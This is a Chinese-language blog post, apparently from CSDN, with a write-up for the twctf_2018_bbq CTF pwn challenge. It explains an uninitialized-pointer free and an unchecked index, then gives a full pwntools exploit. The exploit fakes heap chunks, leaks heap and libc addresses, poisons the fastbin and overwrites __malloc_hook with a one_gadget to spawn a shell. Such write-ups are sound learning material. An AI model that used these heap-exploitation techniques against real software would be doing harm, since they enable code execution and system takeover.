twctf_2018_bbq

最新推荐文章于 2022-05-24 15:04:41 发布
最新推荐文章于 2022-05-24 15:04:41 发布
阅读量434 收藏
点赞数 1
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/107578107
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

twctf_2018_bbq

首先,检查一下程序的保护机制

然后我们用IDA分析一下

在delete功能里,ptr指针存在未初始化的漏洞,因此可以free在栈上伪造的地址,条件是ptr->flag得满足要求,另外index下标没有检查,这也是一个漏洞。

由于getInput后面的length固定,因此我们最开始只能将栈上的ptr指针低1字节覆盖为0,因此,我们需要在堆里对应的伪造伪造好chunk,然后free掉,形成ovelap chunk。

Free时还要特意伪造好flag,否则不能通过检查,并且add_food里使用的strdup来申请堆,因此遇到\0会截断,而flag的值不足8字节,因此最多伪造到flag,比较难构造。

另外需要注意的是,本题堆大小至多0x50,因此想要用fastbin attack,还得借助amount,由于程序中使用链表管理节点,因此在形成overlap chunk以后,我们伪造链表的next指针为malloc_hook上方某处,然后通过add_food,匹配name相同后,就直接对i->amount进行了修改,我们令i为malloc_hook_addr - 0x30,那么name就是\x00,通过add_food(‘\x00’,0x31),可以将malloc_hook_addr – 0x28修改为0x31,这个0x31就可以给我们伪造chunk的size头了。

同时,在堆里伪造程序中链表结构体时,还得借助amount,不然没法实现同时修改fastbin里那个chunk的size和fd指针。

就是构造麻烦了点。

#coding:utf8
from pwn import *

#context.log_level = 'debug'
#sh = process('./twctf_2018_bbq',env={'LD_PRELOAD':'./libc-2.23.so'})
sh = remote('node3.buuoj.cn',26505)
libc = ELF('./libc-2.23.so')
malloc_hook_s = libc.symbols['__malloc_hook']
realloc_s = libc.sym['realloc']
one_gadget = 0xf66f0

def buy(name,amount):
   sh.sendlineafter('Choice:','1')
   sh.sendlineafter('food name >>',name)
   sh.sendlineafter('amount >>',str(amount))

def cook(name,index = -1):
   sh.sendlineafter('Choice:','2')
   sh.sendlineafter('which food >>',name)
   if index != -1:
      sh.sendlineafter('griddle index >>',str(index))

def delete(index):
   sh.sendlineafter('Choice:','3')
   sh.sendlineafter('griddle index >>',str(index))

buy('a',100)
cook('a',10)
buy('b'*0x20,1)
delete(10)
buy('c'*0x10 + p64(0xDEADBEEF11),1) #offset = 0x100
cook('a',11) #offset = 0x120
cook('a',12) #offset = 0x140
delete(11)
buy(p64(0xDEADBEEF11),1) #offset = 0x160
cook('a',13) #offset = 0x180
buy('d'*0x10,1) #offset = 0x1A0
buy('h'*0x10 + p64(0xDEADBEEF11),1) #offset = 0x200
delete(13)
buy(p64(0xDEADBEEF11),1)
cook('a',14) #offset =
cook('a',15)
cook('a',16)
cook('a',17)

delete(12)  #在栈上留下了一个堆地址
cook('a'*0x27) #覆盖堆地址的低1字节为0,正好指向offset=0x100的那个堆
delete(100) #ptr指针未初始化,free掉了offset=0x100的那个堆
sh.sendlineafter('Choice:','1')
sh.recvuntil('* ')
sh.recvuntil('* ')
sh.recvuntil('* ')
sh.recvuntil('* ')
heap_addr = u64(sh.recv(6).ljust(8,'\x00'))
print 'heap_addr=',hex(heap_addr)
sh.sendlineafter('food name >>','c')
sh.sendlineafter('amount >>','0')

buy('c'*0x8 + p16(0x1C1),2) #offset=0x140,伪造一个unsorted bin chunk
cook('a',18)
buy('e'*0x3E,1)
cook('a',19)
cook('a',20)
for i in range(21,30):
   cook('a',i)


cook('a'*0x28 + p64(heap_addr + 0x20)) #修改栈上ptr指针为fake_chunk
#形成overlap chunk
delete(100) #释放offset=0x150的fake_chunk

buy('f'*0x30 + p64(heap_addr  - 0x10),1)
delete(18)
buy(p64(heap_addr + 0xA0),1)
sh.sendlineafter('Choice:','1')
sh.recvuntil('hhh')
sh.recvuntil('* ')
main_arena_88 = u64(sh.recv(6).ljust(8,'\x00'))
malloc_hook_addr = (main_arena_88 & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
one_gadget_addr = libc_base + one_gadget
realloc_addr = libc_base + realloc_s
print 'libc_base=',hex(libc_base)
print 'malloc_hook_addr=',hex(malloc_hook_addr)
print 'one_gadget_addr=',hex(one_gadget_addr)
sh.sendlineafter('food name >>','c')
sh.sendlineafter('amount >>','0')
delete(19)
buy('a'*0x10 + p64(malloc_hook_addr - 0x30),1) #将malloc_hook_addr接入到程序中的链表节点
buy('\x00',0x31) #在malloc_hook_addr - 0x28处写上0x31这个数据

#delete(16)
delete(20)
buy(p64(heap_addr),1)
delete(16) #放入fastbin
#delete(20)
#buy('i'*0x10,0x20)
buy('i'*0x10,0x31) ##这一个的0x31用来伪造堆的size
delete(17)
delete(21)
buy(p64(0xDEADBEEF11),1)

cook('a'*0x28 + p64(heap_addr + 0x120)) #修改栈上ptr指针为当前这个chunk
delete(100) #释放这个chunk
delete(22)
buy('j'*0x10 + p64(heap_addr + 0x200),1)
#现在0x30的fastbin与unsorted bin重合
delete(23)
buy(p64(malloc_hook_addr - 0x30),0x91) #现在0x30的那个fastbin size变为了0x20,fd指向了malloc_hook_addr - 0x30
#把0x30的那个fastbin的size加到0x30
buy('\x00',0x10)

#以下操作将形成head->next->next = NULL这样的布局
delete(24)
delete(25)
buy(p64(0xDEADBEEF11),1)
cook('a'*0x28 + p64(heap_addr + 0x270)) #修改栈上ptr指针为这个chunk
delete(100) #释放这个chunk
delete(26)
buy('k'*0x30 + p64(heap_addr + 0x500),1)

delete(28)
buy('l'*0x20,1) #取出第一个0x30的fastbin
#raw_input()
delete(29)
buy('m'*0x20 + p64(one_gadget_addr),1) #申请到malloc_hook,改写malloc_hook
#getshell
cook('l'*0x20,'\x00')

sh.interactive()

 

ha1vk
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界 四(进阶篇)catch-me
sjt670994562的博客
06-13 1437
后来做题速度完全掉了下去,主要是因为基础太差,不管是c、python语言基础,还是汇编基础,还是linux使用,shell脚本的编写,都差太多,所以经过这几天的冲刺,我打算从基础开始,不急于求成,题会做,但不会那么着急了,太急了学的东西也是没用的,这是这几天卡在这道题上,以及同学对我的一些批评总结出来的一些观点。 catch-me 分析,不是elf不是exe,扔到C32Asm,看到头文件 FD 3...
Printer_BBQ:Printer_BBQ
02-16
磨床Dart工作流程,自动化。 Grinder由定义项目任务的库(例如test , build , doc )和运行它们的命令行工具组成。入门要开始使用grinder ,请将其添加到您的。定义任务任务完全由Dart代码定义,使您可以利用整个...
攻防世界-reverse-simple-unpack
qqqwww_sssd的博客
05-24 165
工具:ExeinfoPe(查壳用) 链接:https://pan.baidu.com/s/1dtYl1Cjx0DLB38kTF8GaPw?pwd=renw 提取码:renw 工具:IDA_Pro_v7.0_Portable 链接:https://pan.baidu.com/s/1CS7xjshF8IoDURz7lCB4jg?pwd=renw 提取码:renw 1.下载附件后,拖入ExeinfoPe后发现此文件并不是.EXE为后缀的文件,而是.ELF, ELF是linux的执行文件 ...
linux软件防修改机制,Linux平台下程序常见的保护机制
weixin_39559804的博客
05-14 429
前言我们都知道任何软件都有漏洞可以利用,软件又都运行在操作系统上,所以操作系统当然就有义务保护这些程序。本文将简单介绍Linux平台下的一些常见保护机制。CANNARY(栈保护)FORTIFYNX(DEP)PIE/PIC与ASLRRELROcannarycannary是一项非常古老的栈保护机制,直到现在都是操作系统安全的第一道防线。canary 不管是实现还是设计思想都比较简单高效, 就是插入一个...
TWCTF中的一道MISC题目-glance.gif图片
syh_486_007的专栏
09-05 4873
题目如下所述: 题目给出了一幅图,里面提供的hint是a glance https://pan.baidu.com/s/1o7Iaw5c题目解答:(1)题目显示是一幅gif图片,从中间闪烁可以看到有内容,在这里科普gif图片,图片是由一帧一帧图片组成,可以将gif图片分解成一个一个图片(2)利用google查一下gif图片的split工具,将gif分解成一幅图片,不多说,加上地址:http:/
攻防世界-RE-三题WP
WocW的博客
04-25 1632
1.re2-cpp-is-awesome 分析 打开看看,发现需要一个参数。在IDA里查找这个luck next time,交叉引用 再次交叉引用,发现到main函数。 这里就是关键的对比了,看起来像是v8经过某个处理后与明文表对比。动态调试看看,下端点在v8,发现我们所输入的字符串没有被处理过,那就更简单了,直接最原始的明文对比。 每次将执行到这里会出现一个flag明文,在下面的跳转指...
em算法matlab代码-BBQ_Nuclear:BBQ_Nuclear
05-26
以下是对"em算法matlab代码-BBQ_Nuclear:BBQ_Nuclear"这个主题的详细解释。 EM算法主要由两步组成:E(期望)步骤和M(最大化)步骤。在E步骤中,我们通过当前估计的参数计算每个观测数据点属于各个隐状态的概率;...
em算法matlab代码-BBQ_Breakfast:BBQ_早餐
05-26
总的来说,EM算法在MATLAB中的实现是一个强大的工具,它允许我们处理含有隐变量的概率模型,而"BBQ_Breakfast"项目则提供了一个具体的应用实例,让我们有机会通过实际代码来学习和应用这一算法。
bbq_表白墙源码_hybbs_php_
09-30
- **bbq.sql**:数据库脚本文件,包含了表白墙所需的数据库结构和初始数据,用于在服务器上创建和初始化数据库。 - **安装说明.txt**:详细介绍了如何安装和配置表白墙源码,包括环境要求、数据库导入、配置文件修改...
ePlant_LIMS解决方案
01-04
### ePlant_LIMS解决方案知识点详解 #### 一、方案概览 **ePlant-LIMS解决方案**专注于服务国内炼油化工领域的实验室(如化验室、质量检测中心等),旨在通过结合国内实验室现行管理机制和国际先进的LIMS技术,构建...
CTF常用后台密码集
08-12
CTF常用后台密码集,可以通过burpsuite进行密码爆破。
CTF比赛中的常见题型
11-13
CTF比赛中的常见题型目录,给初学者提供学习方向。CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。
bbq说明解释
03-20
bbq说明解释
CTF-RE-cello_rule (lib库函数的分析)
SuperGate的博客
09-10 558
题目概述 题目给出了一个linux下的可执行程序和一个加密过的flag.png。可以知道程序是对这个文件进行加密,然后输出加密后的文件。因此我们的思路就是逆向程序的加密方式和逻辑,从而逆推出flag.enc的源文件。 具体分析 由于我们不清楚程序真正逻辑的入口点,因此第一步是ida查看程序的可以字符串。 这些字符串显然是值得我们去研究的,在google上面可以查到这些字符串的信息。发现这些字符串...
Linux下程序的保护机制(checksec)
Y_peak的博客
02-02 1760
Linux下程序的保护机制 前言 相信很多人,查看程序信息时会用到,checksec这个命令。它会给你返回如下图的结果,但是很多最开始看到的人,很多都看不懂,如果身为小白的我,跟在大佬后面比葫芦画瓢,这样用。这篇博文就是用来解释下面信息的,希望对你有所帮助,同时也是为了以后自己忘记可以回顾。 Stack Canary Stack Canray是专门针对栈溢出攻击涉及的一中保护机制。由于栈溢出攻击的主要目标是通过溢出覆盖函数栈高位的返回地址,因此其思路是在函数开始执行前,即返回地址前写入一个字长的随机数据(c
程序保护机制
05-15 595
系统内存保护 1. 基于栈的缓冲区溢出检测(GS/Canary) 我们首先来介绍基于栈的缓冲区溢出检测(GS)的实现,这个机制的本质思想是在缓冲区溢出导致的覆盖位置设置一个标签值,该值具体位于所保存的EBP和RETN(EIP)地址的上方,当从函数返回时会检查这个标签值,看其是否被修改。由于其位于EBP上方,因此一档该值修改,则可以判定RETN也被修改,即发生了缓冲区溢出攻...
TWCTF-reverse_box WP
qq_41252520的博客
07-29 587
分析 IDA分析代码 int __cdecl main(int argc, char **argv) { size_t i; // [esp+18h] [ebp-10Ch] int randnumber; // [esp+1Ch] [ebp-108h] unsigned int v5; // [esp+11Ch] [ebp-8h] v5...
笑脸漏洞渗透linux,TWCTF 2018 escapeme writeup
weixin_30800615的博客
05-16 498
这是我之前见过最好的KVM题了。感谢@shift_crops出的这么吊的题,赛后还放了源码。原题文件可以在作者的repo里找到,包括4个二进制文件,两个文本文件和一个python脚本。我的CTF writeup repo里有我三个exp。介绍题目有三个文件,kvm.elf, kernel.bin和memo-static.elf。这个题里有三个flag,分别需要用户空间任意shellcode执行,内...
sprintf_s 头文件
最新发布
04-30
sprintf_s 是一个C语言中的函数,用于将格式化的数据写入字符串中。它是在 C11 标准中引入的安全版本的 sprintf 函数。sprintf_s 函数的原型定义如下: ```c int sprintf_s(char* buffer, size_t sizeOfBuffer, ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值